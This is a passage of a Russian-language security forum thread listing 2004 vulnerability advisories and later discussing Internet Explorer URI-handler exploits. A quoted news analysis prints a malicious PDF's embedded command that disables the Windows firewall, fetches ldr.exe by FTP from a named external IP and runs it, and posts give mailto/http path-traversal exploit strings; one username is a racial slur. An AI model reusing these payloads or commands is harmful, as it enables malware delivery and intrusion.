Lead to a Denial of Service (824151),
]]>http://www.security.nnov.ru/search/document.asp?docid=6975]]>
Amit Klein (AKsecurity), Microsoft
IIS 5.x/6.0 WebDAV (XML parser) attribute blowup
DoS,
]]>http://www.security.nnov.ru/search/document.asp?docid=6987]]>
Файлы: Microsoft Security Bulletin MS04-030 Vulnerability
in WebDAV XML Message Handler Could Lead to a
Denial of Service (824151),
]]>http://www.microsoft.com/technet/security/...n/MS04-030.mspx]]>
Обсудить: ]]>http://www.security.nnov.ru/board/index.asp?boardnum=4083]]>

7. Многочисленные ошибки в Internet Explorer (multiple bugs), дополнено
с 23 августа 2002 г.

Опубликовано: 13 октября 2004 г.
Источник: MICROSOFT
Тип: удаленная
Опасность: 6
Описание: Вышел очередной накопительный патч.
Продукты: MICROSOFT: Internet Explorer 6.0
MICROSOFT: Internet Explorer 5.5
Документы: MICROSOFT: Security Bulletin MS02-047: Cumulative
Patch for Internet Explorer (Q323759),
]]>http://www.security.nnov.ru/search/document.asp?docid=3411]]>
GreyMagic Software, Accessing remote/local
content in IE (GM#009-IE),
]]>http://www.security.nnov.ru/search/document.asp?docid=3422]]>
NGSSoftware Insight Security Research,
Microsoft Internet Explorer Legacy Text Control Buffer
Overflow (#NISR26082002),
]]>http://www.security.nnov.ru/search/document.asp?docid=3430]]>
GreyMagic Software, Regression in
IE: Accessing remote/local content in IE (GM#009-IE),
]]>http://www.security.nnov.ru/search/document.asp?docid=6984]]>
Обсудить: ]]>http://www.security.nnov.ru/board/index.asp?boardnum=2246]]>

8. Переполнение буфера в RIM Blackberry (buffer overflow)
Опубликовано: 13 октября 2004 г.
Источник: FULL-DISCLOSURE
Тип: удаленная
Опасность: 5
Описание: Переполнение буфера при синхронизации встреч
с Microsoft Exchange.
Продукты: RIM: Blackberry 7230
Документы: vuln@hexview.com, [Full-Disclosure] [HV-HIGH]
RIM Blackberry buffer overflow, DoS, data loss,
]]>http://www.security.nnov.ru/search/document.asp?docid=6994]]>
Обсудить: ]]>http://www.security.nnov.ru/board/index.asp?boardnum=4093]]>

10. Переполнение буфера в ZIP-папках Windows (buffer overflow)
Опубликовано: 13 октября 2004 г.
Источник: MICROSOFT
Тип: клиент
Опасность: 5
Описание: Переполнение целочисленного типа при длинном
имени файла в архиве.
Продукты: MICROSOFT: Windows XP
MICROSOFT: Windows 2003 Server
Документы: MICROSOFT: Microsoft Security Bulletin MS04-034
Vulnerability in Compressed (zipped) Folders Could
Allow Remote Code Execution (873376),
]]>http://www.security.nnov.ru/search/document.asp?docid=6979]]>
EEYE: [Full-Disclosure] EEYE: Windows
Shell ZIP File Decompression DUNZIP32.DLL Buffer
Overflow Vulnerability,
]]>http://www.security.nnov.ru/search/document.asp?docid=6989]]>
Файлы: Microsoft Security Bulletin MS04-034 Vulnerability
in Compressed (zipped) Folders Could Allow Remote
Code Execution (873376),
]]>http://www.microsoft.com/technet/security/...n/MS04-034.mspx]]>
Обсудить: ]]>http://www.security.nnov.ru/board/index.asp?boardnum=4087]]>

11. Выполнение кода через Microsoft Excel (code execution)
Опубликовано: 13 октября 2004 г.
Источник: MICROSOFT
Тип: клиент
Опасность: 5
Продукты: MICROSOFT: Office 2000
MICROSOFT: Office XP
Документы: MICROSOFT: Microsoft Security Bulletin MS04-033
Vulnerability in Microsoft Excel Could Allow Remote
Code Execution (886836),
]]>http://www.security.nnov.ru/search/document.asp?docid=6978]]>
Файлы: Microsoft Security Bulletin MS04-033 Vulnerability
in Microsoft Excel Could Allow Remote Code Execution
(886836),
]]>http://www.microsoft.com/technet/security/...n/MS04-033.mspx]]>
Обсудить: ]]>http://www.security.nnov.ru/board/index.asp?boardnum=4086]]>

12. Переполнение буфера в NetDDE в Microsoft Windows (buffer overflow)
Опубликовано: 13 октября 2004 г.
Источник: MICROSOFT
Тип: удаленная
Опасность: 5
Продукты: MICROSOFT: Windows NT 4.0 Server
MICROSOFT: Windows 2000 Server
MICROSOFT: Windows 2000 Professional
MICROSOFT: Windows XP
MICROSOFT: Windows 2003 Server
Документы: MICROSOFT: Microsoft Security Bulletin MS04-031,
]]>http://www.security.nnov.ru/search/document.asp?docid=6976]]>
Файлы: Microsoft Security Bulletin MS04-031 Vulnerability
in NetDDE Could Allow Remote Code Execution (841533),
]]>http://www.microsoft.com/technet/security/...n/MS04-031.mspx]]>
Обсудить: ]]>http://www.security.nnov.ru/board/index.asp?boardnum=4084]]>

13. Многочисленные проблемы с RPC в Microsoft Windows NT (multiple
bugs)

Опубликовано: 13 октября 2004 г.
Источник: MICROSOFT
Тип: удаленная
Опасность: 5
Продукты: MICROSOFT: Windows NT Server 4.0
Документы: MICROSOFT: Microsoft Security Bulletin MS04-029
Vulnerability in RPC Runtime Library Could Allow
Information Disclosure and Denial of Service (873350),
]]>http://www.security.nnov.ru/search/document.asp?docid=6974]]>
BINDVIEW: [VulnWatch] BindView Advisory:
Memory Leak and DoS in NT4 RPC server,
]]>http://www.security.nnov.ru/search/document.asp?docid=6995]]>
Файлы: Microsoft Security Bulletin MS04-029 Vulnerability
in RPC Runtime Library Could Allow Information Disclosure
and Denial of Service (873350),
]]>http://www.microsoft.com/technet/security/...n/MS04-029.mspx]]>
Обсудить: ]]>http://www.security.nnov.ru/board/index.asp?boardnum=4082]]>

16. Слабые разрешения на службы Windows 2003 Server (weak permissions)
Опубликовано: 13 октября 2004 г.
Источник: BUGTRAQ
Тип: локальная
Опасность: 4
Описание: Разрешения на службы Distributed Link tracking
Server и Internet Connection Firewall Service позволяют
управлять ими непривилегированному пользователю.
Продукты: MICROSOFT: Windows 2003 Server
Документы: Ziots, Edward, Insecure Default Service DACL's
in Windows 2003,
]]>http://www.security.nnov.ru/search/document.asp?docid=6973]]>
Обсудить: ]]>http://www.security.nnov.ru/board/index.asp?boardnum=4081]]>

Новые файлы:
Microsoft Security Bulletin MS04-033 Vulnerability in Microsoft
Excel Could Allow Remote Code Execution (886836)
]]>http://www.microsoft.com/technet/security/...n/MS04-033.mspx]]>
Microsoft Security Bulletin MS04-029 Vulnerability in RPC Runtime
Library Could Allow Information Disclosure and Denial
of Service (873350)
]]>http://www.microsoft.com/technet/security/...n/MS04-029.mspx]]>
Microsoft Security Bulletin MS04-030 Vulnerability in WebDAV
XML Message Handler Could Lead to a Denial of
Service (824151)
]]>http://www.microsoft.com/technet/security/...n/MS04-030.mspx]]>
Microsoft Security Bulletin MS04-031 Vulnerability in NetDDE
Could Allow Remote Code Execution (841533)
]]>http://www.microsoft.com/technet/security/...n/MS04-031.mspx]]>
Microsoft Security Bulletin MS04-032 Security Update for Microsoft
Windows (840987)
]]>http://www.microsoft.com/technet/security/...n/MS04-032.mspx]]>
Microsoft Security Bulletin MS04-034 Vulnerability in Compressed
(zipped) Folders Could Allow Remote Code Execution
(873376)
]]>http://www.microsoft.com/technet/security/...n/MS04-034.mspx]]>
Microsoft Security Bulletin MS04-035 Vulnerability in SMTP Could
Allow Remote Code Execution (885881)
]]>http://www.microsoft.com/technet/security/...n/MS04-035.mspx]]>
Microsoft Security Bulletin MS04-036 Vulnerability in NNTP Could
Allow Remote Code Execution (883935)
]]>http://www.microsoft.com/technet/security/...n/MS04-036.mspx]]>
Microsoft Security Bulletin MS04-037 Vulnerability in Windows
Shell Could Allow Remote Code Execution (841356)
]]>http://www.microsoft.com/technet/security/...n/MS04-037.mspx]]>
Microsoft Security Bulletin MS04-038 Cumulative Security Update
for Internet Explorer (834707)
]]>http://www.microsoft.com/technet/security/...n/MS04-038.mspx]]>
Перейти в начало страницы
 
+Цитировать сообщение
[BlockDog]
сообщение 23.03.2005 - 10:29

Частый гость
***

Группа: Участник
Сообщений: 248
Регистрация: 29.11.2004
Пользователь №: 5564


Последние обновления для Windows 2000 можно скачать тут:
]]>ftp://10.1.176.72/windows.updatez/cabs/]]>
Перейти в начало страницы
 
+Цитировать сообщение
Guest_Not Right Now_*
сообщение 23.03.2005 - 11:17
| Быстрая цитата | Сообщение #14


Гости





Цитата([BlockDog].DaMN @ 23.03.2005 - 10:29)
Последние обновления для Windows 2000  можно скачать тут:
]]>ftp://10.1.176.72/windows.updatez/cabs/]]>

у тебя для русской win2k. твои заплатки мне не ставяться no.gif
Перейти в начало страницы
 
+Цитировать сообщение
Guest_Nigger_*
сообщение 23.03.2005 - 11:34
| Быстрая цитата | Сообщение #15


Гости





Цитата(Encapi @ 23.03.2005 - 11:17)
у тебя для русской win2k. твои заплатки мне не ставяться

Да нет там никаких новых заплаток еще с января(на майкрософте). Только что проверил.
Перейти в начало страницы
 
+Цитировать сообщение
Guest_Not Right Now_*
сообщение 23.03.2005 - 11:35
| Быстрая цитата | Сообщение #16


Гости





Цитата(Nigger @ 23.03.2005 - 11:34)
Да нет там никаких новых заплаток еще с января(на майкрософте). Только что проверил.

я не так уж часто обновляюсь. у меня стоят 4SP и заплатки от червей и всё.
Перейти в начало страницы
 
+Цитировать сообщение
Neolite
сообщение 5.02.2006 - 00:07

#!/usr/bin/neolite
******
орден III степени
Группа: Модератор
Сообщений: 1728
Регистрация: 11.11.2003
Пользователь №: 887


There is a remotely exploitable vulnerability in the Internet Explorer in the JScripting/Flash plugin section.

The problem lies in bad scripting of document.write() method being executed trough VBscript procedure triggered from ActionScript code within the crafted flash animation.
While exiting the IExplorer's jscript.dll call it causes a null pointer assignment in IE leading to the memory access violation and browser crash.

The following configurations has been tested and found vulnerable:
Windows 2000 sp4 with all MS patches
Windows XP sp2
Windows XP64
Windows 98 SE

An example DoS exploit exists at:
]]>http://www.anspi.pl/~porkythepig/iedown.html]]>
and also by clicking the right bottom at:
]]>http://www.anspi.pl/~porkythepig/index.html]]>

Remote code execution possibility hasn't been verified yet , but it still may exist.

Vulnerability found and DoS exploit built by: porkythepig

contact: porkythepig@anspi.pl
Перейти в начало страницы
 
+Цитировать сообщение
CL!F
сообщение 10.11.2007 - 13:57

Энтузиаст
****

Группа: Участник
Сообщений: 361
Регистрация: 12.11.2004
Пользователь №: 5343


Программа:
Microsoft Windows XP
Microsoft Windows Server 2003
Internet Explorer 7

Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных в URI обработчике. Атакующий может передать специально сформированные данные через предоставленный URI, что приведет к выполнению произвольного кода.

Пример:

http:%xx../../../../../../../../../../../windows/syst[скрыто модератором gormih]em32/calc.exe".bat
mailto:test% ../../../../windows/system32/calc.exe".cmd
]]> Данная ссылка является Exploit'ом ошибки в обработке УРЛ"а (Траффик 1 кат.) Качайте на свой страх и риск я никакой ответственности не несу(CL1F) ]]>

://http://www.securityfocus.com/data/v...>[/color]</b>

</a>

ссылка внешняя

Сообщение отредактировано CL!F - 17.11.2007 - 23:52
Перейти в начало страницы
 
+Цитировать сообщение
Holsten
сообщение 14.11.2007 - 11:56

Это вам не это...
*******
орден V степениорден I степени20 лет с форумом
Группа: Участник
Сообщений: 4018
Регистрация: 17.03.2004
Пользователь №: 2796


Цитата(DeaD @ 10.11.2007 - 13:57) *
Пример:

http:%xx../../../../../../../../../../../windows/system32/calc.exe".bat
mailto:test% ../../../../windows/system32/calc.exe".cmd
[скрыто модератором gormih]


ссылка внешняя
Только всё не много по другому, а приведённая ссылка не иначе как ссылка на вирус

Цитата
За вирусной PDF-атакой стоит питерский хостинг RBN ?

Если пользователь открывает зараженный файл, троян вырубает защитные системы Windows и закачивает на зараженный компьютер пару скрытых приложений, которые крадут финансовую и другую ценную информацию. Условия для успешной атаки - браузер IE7 на Windows XP или Windows Server 2003, а также старые версии Adobe Reader или Adobe Acrobat.

При этом шпионские программы закачиваются с серверов российского хостинга RBN, сообщил Кен Данхэм, специалист по безопасности из iSight Partners. По его словам, и эти адреса, и сами шпионские файлы давно известны - те же вредоносные коды использовались в сентябре 2006 года для атак через дыру в VML.

Более подробный разбор хакерского кода в PDF-файлах был сделан сегодня и российскими экспертами по безопасности. Они также отмечают, что вредоносный загрузчик хостится в сети Russian Business Network.

Фрагмент PDF:

##5 0 obj<>dendobjd6 0 obj###<<###/CropBox[0 0 595 842]/Parent 1 0 R/Contents 13 0 R/Rotate 0/Group<
###<####/I true/CS/DeviceRGB/S/Transparency>>/MediaBox[0 0 595 842]/Resources 7 0 R/Type/Page/AA<>>>dendobjd14 0 obj<
%/../../../../../../Windows/system32/cmd".exe"" /c /q "@echo off&netsh firewall set opmode mode=disable&echo o 81.95.146.130>1&echo b
inary>>1&echo get /ldr.exe>>1&echo quit>>1&ftp -s:1 -v -A>nul&del /q 1& start ldr.exe&" "&" "nul.bat)/S/URI>>dendobjd1 0 obj<

Примерно вот так это выглядит, если по-русски:

/Windows/system32/cmd".exe"" /c /q
@echo off
netsh firewall set opmode mode=disable
echo o 81.95.146.130
echo binary
echo get /ldr.exe
echo quit
ftp -s:1 -v -A>nul
del /q
start ldr.exe

Адрес принадлежит конечно РБН:
Добавил: Leon
29.10.2007 03:10

Источник: ]]>http://www.inattack.ru/news/2361.html]]>


Сообщение отредактировано gormih - 16.11.2007 - 00:40
Перейти в начало страницы
 
+Цитировать сообщение
CL!F
сообщение 15.11.2007 - 23:55

Энтузиаст
****

Группа: Участник
Сообщений: 361
Регистрация: 12.11.2004
Пользователь №: 5343


Михаил с чего мне нужно подсовывать вирусы я ссылки проверяю лично) Файл был просканирован на наличе spyware and viruses ничего не обнаружено. На спайвары - аутпост - на вирусы - нод с послед обновлениями. но сам текст pdf'a не понятен..
вот txt файл с текстом PDF'a

Сообщение отредактировано gormih - 16.11.2007 - 00:39
Перейти в начало страницы
 
+Цитировать сообщение

2 страниц V   1 2 >
Ответить в данную темуНачать новую тему
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0

 



RSS Текстовая версия Сейчас: 27.12.2024 - 06:51